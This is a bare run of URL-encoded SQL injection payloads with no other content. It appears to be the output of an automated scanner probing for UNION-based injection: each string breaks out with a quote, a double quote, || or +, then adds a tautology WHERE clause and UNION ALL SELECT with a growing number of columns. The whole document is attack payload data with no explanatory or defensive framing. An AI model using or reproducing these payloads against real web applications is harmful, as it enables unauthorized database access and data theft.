-6245%27%20WHERE%206643%3D6643%20UNION%20ALL%20SELECT%206643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%2C6643%23 -9373%27%20WHERE%203621%3D3621%20UNION%20ALL%20SELECT%203621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%2C3621%23 -8123%27%20WHERE%202668%3D2668%20UNION%20ALL%20SELECT%202668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%23 -5813%27%20WHERE%207780%3D7780%20UNION%20ALL%20SELECT%207780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%2C7780%23 -3993%27%20WHERE%208174%3D8174%20UNION%20ALL%20SELECT%208174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%2C8174%23 -1435%27%20WHERE%209550%3D9550%20UNION%20ALL%20SELECT%209550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%2C9550%23 -1468%27%20WHERE%206373%3D6373%20UNION%20ALL%20SELECT%206373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%2C6373%23 -4345%27%20WHERE%206797%3D6797%20UNION%20ALL%20SELECT%206797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%2C6797%23 -3052%27%20WHERE%205114%3D5114%20UNION%20ALL%20SELECT%205114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%2C5114%23 -2499%27%20WHERE%208397%3D8397%20UNION%20ALL%20SELECT%208397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%2C8397%23 -1959%22%20WHERE%202202%3D2202%20UNION%20ALL%20SELECT%202202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%23 -6416%22%20WHERE%204033%3D4033%20UNION%20ALL%20SELECT%204033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%23 -7381%22%20WHERE%207668%3D7668%20UNION%20ALL%20SELECT%207668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%2C7668%23 -7357%22%20WHERE%205084%3D5084%20UNION%20ALL%20SELECT%205084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%2C5084%23 -8400%22%20WHERE%207031%3D7031%20UNION%20ALL%20SELECT%207031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%2C7031%23 -5996%22%20WHERE%208681%3D8681%20UNION%20ALL%20SELECT%208681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%2C8681%23 -7729%22%20WHERE%202613%3D2613%20UNION%20ALL%20SELECT%202613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%2C2613%23 -4479%22%20WHERE%209061%3D9061%20UNION%20ALL%20SELECT%209061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%23 -4439%22%20WHERE%208608%3D8608%20UNION%20ALL%20SELECT%208608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%2C8608%23 -9168%22%20WHERE%206021%3D6021%20UNION%20ALL%20SELECT%206021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%2C6021%23 -3079%20WHERE%209841%3D9841%20UNION%20ALL%20SELECT%209841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%23 -5468%20WHERE%202269%3D2269%20UNION%20ALL%20SELECT%202269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%2C2269%23 -8506%20WHERE%202647%3D2647%20UNION%20ALL%20SELECT%202647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%2C2647%23 -1810%20WHERE%206389%3D6389%20UNION%20ALL%20SELECT%206389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%2C6389%23 -8661%20WHERE%202270%3D2270%20UNION%20ALL%20SELECT%202270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%23 -8629%20WHERE%207223%3D7223%20UNION%20ALL%20SELECT%207223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%23 -5688%20WHERE%208405%3D8405%20UNION%20ALL%20SELECT%208405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%2C8405%23 -3255%20WHERE%201426%3D1426%20UNION%20ALL%20SELECT%201426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%2C1426%23 -8584%20WHERE%201563%3D1563%20UNION%20ALL%20SELECT%201563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%23 -4806%20WHERE%204250%3D4250%20UNION%20ALL%20SELECT%204250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%23 -5349%27%7C%7C%28SELECT%20%27aufX%27%20FROM%20DUAL%20WHERE%206110%3D6110%20UNION%20ALL%20SELECT%206110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%23 -1087%27%7C%7C%28SELECT%20%27cjVs%27%20FROM%20DUAL%20WHERE%208219%3D8219%20UNION%20ALL%20SELECT%208219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%2C8219%23 -6859%27%7C%7C%28SELECT%20%27AYCC%27%20FROM%20DUAL%20WHERE%203256%3D3256%20UNION%20ALL%20SELECT%203256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%2C3256%23 -7957%27%7C%7C%28SELECT%20%27mwNk%27%20FROM%20DUAL%20WHERE%209246%3D9246%20UNION%20ALL%20SELECT%209246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%23 -6681%27%7C%7C%28SELECT%20%27ROjs%27%20FROM%20DUAL%20WHERE%201919%3D1919%20UNION%20ALL%20SELECT%201919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%23 -9656%27%7C%7C%28SELECT%20%27fJbc%27%20FROM%20DUAL%20WHERE%206272%3D6272%20UNION%20ALL%20SELECT%206272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%23 -2145%27%7C%7C%28SELECT%20%27jiXi%27%20FROM%20DUAL%20WHERE%208768%3D8768%20UNION%20ALL%20SELECT%208768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%23 -4660%27%7C%7C%28SELECT%20%27OMfQ%27%20FROM%20DUAL%20WHERE%208828%3D8828%20UNION%20ALL%20SELECT%208828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%2C8828%23 -7156%27%7C%7C%28SELECT%20%27AmNg%27%20FROM%20DUAL%20WHERE%201997%3D1997%20UNION%20ALL%20SELECT%201997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%23 -9722%27%7C%7C%28SELECT%20%27UGzi%27%20FROM%20DUAL%20WHERE%207486%3D7486%20UNION%20ALL%20SELECT%207486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%23 -8473%27%7C%7C%28SELECT%20%27gajg%27%20WHERE%203274%3D3274%20UNION%20ALL%20SELECT%203274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%23 -5243%27%7C%7C%28SELECT%20%27djpT%27%20WHERE%205876%3D5876%20UNION%20ALL%20SELECT%205876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%2C5876%23 -8286%27%7C%7C%28SELECT%20%27yOVq%27%20WHERE%207818%3D7818%20UNION%20ALL%20SELECT%207818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%2C7818%23 -7661%27%7C%7C%28SELECT%20%27kJwr%27%20WHERE%202032%3D2032%20UNION%20ALL%20SELECT%202032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%2C2032%23 -8268%27%7C%7C%28SELECT%20%27Zugt%27%20WHERE%204040%3D4040%20UNION%20ALL%20SELECT%204040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%23 -5037%27%7C%7C%28SELECT%20%27mGUJ%27%20WHERE%201531%3D1531%20UNION%20ALL%20SELECT%201531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%23 -7926%27%7C%7C%28SELECT%20%27gqAs%27%20WHERE%205168%3D5168%20UNION%20ALL%20SELECT%205168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%2C5168%23 -4746%27%7C%7C%28SELECT%20%27acyH%27%20WHERE%206729%3D6729%20UNION%20ALL%20SELECT%206729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%23 -4182%27%7C%7C%28SELECT%20%27dscz%27%20WHERE%208359%3D8359%20UNION%20ALL%20SELECT%208359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%23 -3934%27%7C%7C%28SELECT%20%27eAZz%27%20WHERE%209863%3D9863%20UNION%20ALL%20SELECT%209863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%2C9863%23 -6717%27%2B%28SELECT%20BCgX%20WHERE%203491%3D3491%20UNION%20ALL%20SELECT%203491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%2C3491%23 -1573%27%2B%28SELECT%20aDrd%20WHERE%203326%3D3326%20UNION%20ALL%20SELECT%203326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%2C3326%23 -5112%27%2B%28SELECT%20yFah%20WHERE%201545%3D1545%20UNION%20ALL%20SELECT%201545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%23 -7161%27%2B%28SELECT%20fCsA%20WHERE%205374%3D5374%20UNION%20ALL%20SELECT%205374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%2C5374%23 -5423%27%2B%28SELECT%20BerA%20WHERE%202521%3D2521%20UNION%20ALL%20SELECT%202521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%2C2521%23 -1131%27%2B%28SELECT%20kbLe%20WHERE%206910%3D6910%20UNION%20ALL%20SELECT%206910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%23 -4525%27%2B%28SELECT%20mzHH%20WHERE%208714%3D8714%20UNION%20ALL%20SELECT%208714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%23 -9500%27%2B%28SELECT%20gqWD%20WHERE%202141%3D2141%20UNION%20ALL%20SELECT%202141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%23 -5661%27%2B%28SELECT%20domQ%20WHERE%208980%3D8980%20UNION%20ALL%20SELECT%208980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%2C8980%23 -4448%27%2B%28SELECT%20wpNV%20WHERE%203190%3D3190%20UNION%20ALL%20SELECT%203190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%23 -1460%27%2B%28SELECT%20%27CZLW%27%20WHERE%206503%3D6503%20UNION%20ALL%20SELECT%206503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%2C6503%23 -1271%27%2B%28SELECT%20%27bWtV%27%20WHERE%206305%3D6305%20UNION%20ALL%20SELECT%206305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%23 -8414%27%2B%28SELECT%20%27TICy%27%20WHERE%205491%3D5491%20UNION%20ALL%20SELECT%205491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%2C5491%23 -2439%27%2B%28SELECT%20%27SBRG%27%20WHERE%203263%3D3263%20UNION%20ALL%20SELECT%203263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%2C3263%23 -3488%27%2B%28SELECT%20%27MSCv%27%20WHERE%206171%3D6171%20UNION%20ALL%20SELECT%206171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%2C6171%23 -7950%27%2B%28SELECT%20%27eOGB%27%20WHERE%208918%3D8918%20UNION%20ALL%20SELECT%208918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%2C8918%23 